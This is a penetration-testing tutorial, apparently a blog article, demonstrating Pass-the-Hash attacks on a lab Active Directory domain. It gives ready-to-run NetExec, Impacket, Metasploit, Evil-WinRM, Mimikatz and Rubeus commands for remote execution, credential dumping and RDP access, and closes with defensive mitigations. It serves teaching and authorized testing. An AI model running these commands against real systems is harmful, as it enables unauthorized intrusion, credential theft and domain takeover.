Introduction

In the world of Windows network security, one of the most powerful and dangerous lateral movement techniques is the Pass-the-Hash (PtH) attack. Unlike traditional password-based attacks that require cracking or guessing credentials, PtH allows an attacker to authenticate as a user using only the captured NTLM hash of their password — without ever knowing the actual plaintext password.

This article provides a comprehensive technical walkthrough of Pass-the-Hash attacks against a Windows Active Directory (AD) environment. We demonstrate the attack using multiple popular offensive security tools including NetExec (nxc), Impacket, Metasploit, Evil-WinRM, and pth-winexe. All techniques shown are for educational and authorized penetration testing purposes only.

Table of Contents

• Introduction
• Lab Environment
• What is Pass-the-Hash (PtH)?
• Key Concepts

SMB (Pass-the-Hash)

• NXC
• Impacket PSExec
• Impacket SecretsDump
• Metasploit (SMB PSExec)
• pth-winexe

WinRM (Pass-the-Hash)

• NXC
• Evil-WinRM
• Metasploit

WMI (Pass-the-Hash)

• NXC
• Impacket wmiexec

MSSQL (Pass-the-Hash)

• NXC
• Impacket mssqlclient
• pth-sqsh

RDP (Pass-the-Hash)

• xfreerdp

LDAP (Pass-the-Hash)

• NXC
• Metasploit
• ldeep

Windows (Pass-the-Hash)

• Mimikatz (sekurlsa::pth)
• Rubeus (Overpass-the-Hash)

Mitigation Strategies

Conclusion

Lab Environment

• Target: Windows Server 2019 Domain Controller (DC) 192.168.1.11
• Domain: ignite.local
• Attacker Machine: Kali Linux — 192.168.1.17
• Target OS Build: Windows 10 / Server 2019 Build 17763 x64

What is a Pass-the-Hash Attack?

When a user logs in on a Windows system, their password is never stored in plaintext. Instead, Windows computes an NTLM hash (an MD4 hash of the Unicode password) and stores it in the SAM database or, in domain environments, in the NTDS.DIT file on the Domain Controller.

The core vulnerability that PtH exploits is the NTLM authentication protocol itself. During NTLM authentication, the client proves knowledge of the password by computing a response using the hash — not the plaintext. This means that if an attacker can obtain the hash, they can impersonate any user without cracking the password.

Key Concepts

• NTLM Hash: MD4 hash of the Unicode password (stored in SAM/NTDS.DIT)
• LM Hash: Legacy, weak predecessor to NTLM (usually empty/zeroed out in modern systems)
• Hash Format: <username>:<RID>:<LM hash>:<NTLM hash>:::
• Pass-the-Hash works because NTLM auth uses the hash directly as a credential

SMB (Pass the Hash)

NXC

The nxc smb -x command allows attackers to execute commands remotely on a Windows system using NTLM hash authentication. While powerful and reliable, it is less stealthy due to service creation and logging, making it more detectable compared to WMI-based techniques.

nxc smb 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Impacket-PSExec

The impacket-psexec command enables remote command execution over SMB using NTLM hash authentication. By creating a temporary service on the target system, it provides a powerful way to gain a high-privileged shell, making it a commonly used technique for lateral movement in Active Directory environments.

impacket-psexec ignite.local/administrator@192.168.1.11 -hashes :32196B56FFE6F45E294117B91A83BF38

Impacket-SecretDump

The impacket-secretsdump command is a powerful technique for extracting credentials from remote systems using NTLM hash authentication. It enables attackers to retrieve sensitive data such as password hashes and domain credentials, making it a critical tool for privilege escalation and lateral movement in Active Directory environments.

impacket-secretsdump ignite.local/shivam@192.168.1.11 -hashes :64FBAE31CC352FC26AF97CBDEF151E03

Metasploit (Microsoft Windows Authenticated User Code Execution)

This module executes an arbitrary payload using a valid administrator username and password (or password hash). This module is comparable to SysInternals’ “psexec” utility. It is now possible for this module to clean up after itself. This program generates a service with a randomly selected name and description.

use exploit/windows/smb/psexec
set rhosts 192.168.1.11
set smbuser administrator
set smbdomain ignite.local
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
run

PTH-Winexe

The pth-winexe command enables remote command execution over SMB using NTLM hash authentication. It works by creating a temporary service on the target system and executing commands with elevated privileges, making it a powerful but less stealthy method for lateral movement.

pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.11 cmd.exe

Winrm (Pass the Hash)

NXC

nxc winrm is used to authenticate and execute commands on Windows systems via Windows Remote Management (WinRM) (ports 5985 / 5986). It’s commonly used for lateral movement in Active Directory environments.

nxc winrm 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Evil-WinRM

The evil-winrm command allows attackers to gain a fully interactive PowerShell session on a remote Windows machine using NTLM hash authentication. It is one of the most convenient and powerful methods for post-exploitation and lateral movement in Active Directory environments.

evil-winrm -i 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

Metasploit

This module is used to execute scripts or payloads on a remote Windows system via WinRM.

use auxiliary/scanner/winrm/winrm_script_exec
set RHOSTS 192.168.1.11
set USERNAME administrator
set PASSWORD 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
run

This module is used to execute commands on remote Windows systems via WinRM using valid credentials.

use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 192.168.1.11
set USERNAME administrator
set PASSWORD 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38

WMI (Pass the Hash)

NXC

The nxc wmi -x command enables remote execution of system commands on a target machine using NTLM hash authentication. It is a fast and effective method for lateral movement, allowing attackers to execute commands without requiring an interactive session.

nxc wmi 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x dir

impacket-wmiexec

The impacket-wmiexec command enables remote command execution on a Windows system using NTLM hash authentication. By leveraging WMI, it provides a stealthier alternative to traditional methods like PsExec, making it a popular choice for lateral movement in Active Directory environments.

impacket-wmiexec ignite.local/administrator@192.168.1.11 -hashes :32196B56FFE6F45E294117B91A83BF38

MSSQL (Pass the Hash)

NXC

This command uses NetExec (nxc) to authenticate to an MSSQL service and execute a system command via Pass-the-Hash (PtH).

nxc mssql 192.168.1.9 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Impacket-MSSqlClient

The impacket-mssqlclient command enables authentication to MSSQL using NTLM hashes via Windows authentication. It provides a powerful interactive SQL shell that can be leveraged for database enumeration and, if privileges allow, full system compromise through command execution.

impacket-mssqlclient raj@192.168.1.9 -hashes 00000000000000000000000000000000:64FBAE31CC352FC26AF97CBDEF151E03 -windows-auth

• raj@192.168.1.9 → User raj connecting to the target server
• -hashes LM:NT → Supplies the LM hash (dummy) and NTLM hash (actual credential)
• -windows-auth → Uses Windows/Active Directory authentication instead of SQL login

Pth-sqsh

The pth-sqsh command allows attackers to authenticate to MSSQL using NTLM hashes, bypassing the need for plaintext credentials. Once access is obtained, it provides an interactive SQL shell that can be leveraged for database enumeration and even remote command execution.

pth-sqsh -S mssql -U 'ignite\Administrator' -P '00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.9

How it Works:

• Uses sqsh (SQL shell client) with PTH support
• Sends the NTLM hash during authentication
• Connects via Windows Authentication
• Grants interactive SQL access if successful

RDP (Pass the Hash)

Xfreedrp

xfreerdp supports PtH to authenticate to RDP (port 3389) using NTLM hashes instead of plaintext passwords.

The xfreerdp3 /pth command enables attackers to establish a full RDP session using only an NTLM hash. This is a powerful Pass-the-Hash technique that provides interactive access to a remote system without needing the user’s plaintext password.

xfreerdp3 /u:administrator /v:192.168.1.11 /cert:ignore /pth:32196B56FFE6F45E294117B91A83BF38 /timeout:20000 /size:1920x1080

Ldap (Pass the Hash)

NXC

The nxc ldap -M whoami command provides a quick and reliable way to validate NTLM hash-based authentication against Active Directory. It helps penetration testers confirm access before proceeding with deeper enumeration or exploitation.

nxc ldap 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -M whoami

Metasploit

auxiliary/gather/ldap_query is a Metasploit module used to query an LDAP server using either a custom LDAP query or a set of pre-built enumeration actions against an Active Directory Domain Controller.​

use auxiliary/gather/ldap_query                                                                                                                                                                                                                                                                                                                                                                                                                                   
set RHOSTS 192.168.1.11                                                                                                                                                                                                                                                                      
set USERNAME Administrator                                                                                                                                                                                                                                                                      
set LDAPPassword 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38                                                                                                                                                                                                                  
set LDAPDOMAIN ignite.local
run

Ldeep

ldeep is a Python-based Active Directory enumeration tool designed specifically for LDAP recon. Unlike traditional ldapsearch, it provides clean, human-readable output and supports multiple backends (LDAP, Kerberos, cache). It’s a common tool in the red teamer’s arsenal for mapping out AD environments.

ldeep ldap -u Administrator -H :32196B56FFE6F45E294117B91A83BF38 -d ignite.local -s ldap 192.168.1.11 users

Windows (Pass the Hash)

Mimikatz

Mimikatz is the ultimate tool when it comes to getting toe-to-toe with Windows Security. We used the Administrator and the Hash. 

The sekurlsa::pth command in Mimikatz enables attackers to authenticate as a user using only their NTLM hash by injecting it into a new process. This technique is a core component of lateral movement in Active Directory attacks and eliminates the need for plaintext credentials.

sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Rubeus

The Rubeus asktgt command enables attackers to request a Kerberos TGT using an NTLM hash and inject it into the current session. This technique, known as Overpass-the-Hash, bridges NTLM credentials into Kerberos authentication, allowing stealthy lateral movement in Active Directory environments.

Rubeus.exe asktgt /domain:igntie.local /user:Administrator /rc4: 32196b56ffe6f45e294117b91a83bf38 /ptt

Mitigation Strategies

• Enable Windows Credential Guard to protect NTLM hashes in memory (requires UEFI + Hyper-V)
• Apply KB2871997 to restrict NTLM credential caching (prevents PtH in many scenarios)
• Implement the principle of least privilege — do not use Domain Admin accounts for daily operations
• Disable NTLM authentication where possible — enforce Kerberos with AES encryption
• Enable Protected Users Security Group for sensitive accounts — blocks NTLM auth for members
• Implement tiered administration model — separate Tier 0 (DC), Tier 1 (Servers), Tier 2 (Workstations)
• Deploy Microsoft LAPS (Local Administrator Password Solution) to randomize local admin passwords
• Enable SMB Signing to prevent relay attacks that often complement PtH
• Restrict WinRM access via Windows Firewall to authorized management hosts only
• Monitor and alert on lateral movement patterns with a SIEM (Splunk, Microsoft Sentinel, etc.)

Conclusion

Pass-the-Hash remains one of the most powerful and widely-used lateral movement techniques in Active Directory environments. The attack chain demonstrated in this article — from DCSync credential dumping to full RDP graphical access — illustrates how a single compromised NTLM hash can grant an attacker complete domain dominance across multiple protocols and services.

The key takeaways for penetration testers are: PtH works natively with a rich ecosystem of tools; multiple protocols (SMB, WMI, WinRM, RDP, MSSQL) are all vulnerable; and a single admin hash can propagate access across the entire environment. For defenders, the priority must be reducing NTLM usage, implementing Credential Guard, and establishing comprehensive lateral movement detection through event log monitoring and behavioral analytics.